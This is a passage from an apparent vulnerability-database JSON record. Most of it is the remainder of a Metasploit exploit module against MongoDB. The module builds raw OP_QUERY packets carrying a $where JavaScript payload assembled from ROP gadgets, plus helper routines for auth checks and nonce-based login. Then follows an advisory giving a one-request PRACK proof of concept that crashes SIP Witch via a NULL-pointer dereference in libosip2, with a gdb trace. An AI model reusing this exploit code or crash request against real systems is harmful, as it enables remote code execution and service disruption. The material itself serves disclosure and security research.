'+gadget1+'}, '\n payload_js << '[\"A\"+\"'+gadget3+'\"+\"'+Rex::Text.rand_text_hex(12)+'\"+\"'+gadget2+'\"+\"'+Rex::Text.rand_text_hex(28)+'\"+\"'+gadget4+'\"+\"\\\\x20\\\\x20\\\\x20\\\\x20\"+\"'+gadget5+'\"]);'\n\n request_id = Rex::Text.rand_text(4)\n\n packet = request_id #requestID\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY)\n packet << \"\\x00\\x00\\x00\\x00\" #flags\n packet << datastore['DB']+\".\"+collection+\"\\x00\" #fullCollectionName (db.collection)\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\n packet << \"\\x01\\x00\\x00\\x00\" #numberToReturn (1)\n\n where = \"\\x02\\x24\\x77\\x68\\x65\\x72\\x65\\x00\"\n where << [payload_js.length+4].pack(\"L\")\n where << payload_js+\"\\x00\"\n\n where.insert(0, [where.length + 4].pack(\"L\"))\n\n packet += where\n packet.insert(0, [packet.length + 4].pack(\"L\"))\n\n sock.put(packet)\n\n disconnect\n rescue ::Exception => e\n fail_with(Failure::Unreachable, \"Unable to connect\")\n end\n end\n\n def require_auth?\n request_id = Rex::Text.rand_text(4)\n packet = \"\\x3f\\x00\\x00\\x00\" #messageLength (63)\n packet << request_id #requestID\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY)\n packet << \"\\x00\\x00\\x00\\x00\" #flags\n packet << \"\\x61\\x64\\x6d\\x69\\x6e\\x2e\\x24\\x63\\x6d\\x64\\x00\" #fullCollectionName (admin.$cmd)\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\n packet << \"\\x01\\x00\\x00\\x00\" #numberToReturn (1)\n #query ({\"listDatabases\"=>1})\n packet << \"\\x18\\x00\\x00\\x00\\x10\\x6c\\x69\\x73\\x74\\x44\\x61\\x74\\x61\\x62\\x61\\x73\\x65\\x73\\x00\\x01\\x00\\x00\\x00\\x00\"\n\n sock.put(packet)\n response = sock.get_once\n\n have_auth_error?(response)\n end\n\n def read_only?(collection)\n request_id = Rex::Text.rand_text(4)\n _id = \"\\x07_id\\x00\"+Rex::Text.rand_text(12)+\"\\x02\"\n key = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')+\"\\x00\"\n value = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')+\"\\x00\"\n\n insert = _id+key+[value.length].pack(\"L\")+value+\"\\x00\"\n\n packet = [insert.length+24+datastore['DB'].length+6].pack(\"L\") #messageLength\n packet << request_id #requestID\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\n packet << \"\\xd2\\x07\\x00\\x00\" #opCode (2002 Insert Document)\n packet << \"\\x00\\x00\\x00\\x00\" #flags\n packet << datastore['DB'] + \".\" + collection + \"\\x00\" #fullCollectionName (DB.collection)\n packet << [insert.length+4].pack(\"L\")\n packet << insert\n\n sock.put(packet)\n\n request_id = Rex::Text.rand_text(4)\n\n packet = [datastore['DB'].length + 61].pack(\"L\") #messageLength (66)\n packet << request_id #requestID\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 Query)\n packet << \"\\x00\\x00\\x00\\x00\" #flags\n packet << datastore['DB'] + \".$cmd\" + \"\\x00\" #fullCollectionName (DB.$cmd)\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\n packet << \"\\xff\\xff\\xff\\xff\" #numberToReturn (1)\n packet << \"\\x1b\\x00\\x00\\x00\"\n packet << \"\\x01\\x67\\x65\\x74\\x6c\\x61\\x73\\x74\\x65\\x72\\x72\\x6f\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x3f\\x00\"\n\n sock.put(packet)\n\n response = sock.get_once\n have_auth_error?(response)\n end\n\n def do_login\n print_status(\"Trying #{datastore['USERNAME']}/#{datastore['PASSWORD']} on #{datastore['DB']} database\")\n nonce = get_nonce\n status = auth(nonce)\n return status\n end\n\n def auth(nonce)\n request_id = Rex::Text.rand_text(4)\n packet = request_id #requestID\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY)\n packet << \"\\x00\\x00\\x00\\x00\" #flags\n packet << datastore['DB'] + \".$cmd\" + \"\\x00\" #fullCollectionName (DB.$cmd)\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\n packet << \"\\xff\\xff\\xff\\xff\" #numberToReturn (1)\n\n #{\"authenticate\"=>1.0, \"user\"=>\"root\", \"nonce\"=>\"94e963f5b7c35146\", \"key\"=>\"61829b88ee2f8b95ce789214d1d4f175\"}\n document = \"\\x01\\x61\\x75\\x74\\x68\\x65\\x6e\\x74\\x69\\x63\\x61\\x74\\x65\"\n document << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x3f\\x02\\x75\\x73\\x65\\x72\\x00\"\n document << [datastore['USERNAME'].length + 1].pack(\"L\") # +1 due null byte termination\n document << datastore['USERNAME'] + \"\\x00\"\n document << \"\\x02\\x6e\\x6f\\x6e\\x63\\x65\\x00\\x11\\x00\\x00\\x00\"\n document << nonce + \"\\x00\"\n document << \"\\x02\\x6b\\x65\\x79\\x00\\x21\\x00\\x00\\x00\"\n document << Rex::Text.md5(nonce + datastore['USERNAME'] + Rex::Text.md5(datastore['USERNAME'] + \":mongo:\" + datastore['PASSWORD'])) + \"\\x00\"\n document << \"\\x00\"\n #Calculate document length\n document.insert(0, [document.length + 4].pack(\"L\"))\n\n packet += document\n\n #Calculate messageLength\n packet.insert(0, [(packet.length + 4)].pack(\"L\")) #messageLength\n sock.put(packet)\n response = sock.get_once\n if have_auth_error?(response)\n print_error(\"Bad login or DB\")\n return 0\n else\n print_good(\"Successful login on DB #{datastore['db']}\")\n return 1\n end\n\n\n end\n\n def get_nonce\n request_id = Rex::Text.rand_text(4)\n packet = [datastore['DB'].length + 57].pack(\"L\") #messageLength (57+DB.length)\n packet << request_id #requestID\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY)\n packet << \"\\x00\\x00\\x00\\x00\" #flags\n packet << datastore['DB'] + \".$cmd\" + \"\\x00\" #fullCollectionName (DB.$cmd)\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\n packet << \"\\x01\\x00\\x00\\x00\" #numberToReturn (1)\n #query {\"getnonce\"=>1.0}\n packet << \"\\x17\\x00\\x00\\x00\\x01\\x67\\x65\\x74\\x6e\\x6f\\x6e\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x3f\\x00\"\n\n sock.put(packet)\n response = sock.get_once\n documents = response[36..1024]\n #{\"nonce\"=>\"f785bb0ea5edb3ff\", \"ok\"=>1.0}\n nonce = documents[15..30]\n end\n\n def have_auth_error?(response)\n #Response header 36 bytes long\n documents = response[36..1024]\n #{\"errmsg\"=>\"auth fails\", \"ok\"=>0.0}\n #{\"errmsg\"=>\"need to login\", \"ok\"=>0.0}\n if documents.include?('errmsg') || documents.include?('unauthorized')\n return true\n else\n return false\n end\n end\nend\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/mongod_native_helper.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "description": "\r\n\r\n####################################\r\n# SIP Witch 0.7.4 w/libosip2-4.0.0 #\r\n####################################\r\n#\r\n# Authors:\r\n#\r\n# 22733db72ab3ed94b5f8a1ffcde850251fe6f466\r\n# c8e74ebd8392fda4788179f9a02bb49337638e7b\r\n# AKAT-1\r\n#\r\n#######################################\r\n\r\n* DoS by the NULL pointer derefence in libosip2. True, found in the ancient version of sipwitch\r\n (default in BT5) but the problem lies in the library used by it and may affect other software.\r\n Found independently of http://lists.gnu.org/archive/html/linphone-developers/2012-07/msg00019.html\r\n\r\n POC (request):\r\n -- cut --\r\n PRACK sip:1@127.0.0.1:5060;transport=udp SIP/2.0\r\n Call-ID: a\r\n -- cut --\r\n\r\n Results:\r\n -- cut --\r\n sipw[25179]: segfault at 8 ip 00007fae01583b20 sp 00007fadfed09d38 error 4 in libosipparser2.so.4.2.0[7fae01571000+25000]\r\n\r\n Core was generated by `/usr/sbin/sipw -d'.\r\n Program terminated with signal 11, Segmentation fault.\r\n (gdb) bt\r\n #0 0x00007f1d4522bb20 in osip_list_get_first () from /usr/lib/libosipparser2.so.4\r\n #1 0x00007f1d4544a6b7 in __osip_remove_ict_transaction () from /usr/lib/libosip2.so.4\r\n #2 0x00007f1d4544bc15 in osip_transaction_free () from /usr/lib/libosip2.so.4\r\n #3 0x00007f1d4544c0a9 in osip_transaction_init () from /usr/lib/libosip2.so.4\r\n ...\r\n (gdb) disas\r\n Dump of assembler code for function osip_list_get_first:\r\n => 0x00007f2f661c6b20 <+0>: mov (%rdi),%eax\r\n ...\r\n (gdb) i r\r\n rax 0x0 0\r\n ...\r\n -- cut --\r\n\r\n osipparser2/osip_list.c#221:\r\n -- cut --\r\n void *\r\n osip_list_get_first (osip_list_t * li, osip_list_iterator_t * iterator)\r\n {\r\n if (0 >= li->nb_elt) <-- NPD\r\n ...\r\n -- cut --\r\n\r\nEOF\r\n", "modified": "2013-03-11T00:00:00", "published": "2013-03-11T00:00:00", "id": "SECURITYVULNS:DOC:29157", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29157", "title": "SIP Witch 0.7.4 w/libosip2-4.0.0 DoS via NULL pointer derefence in libosip2", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
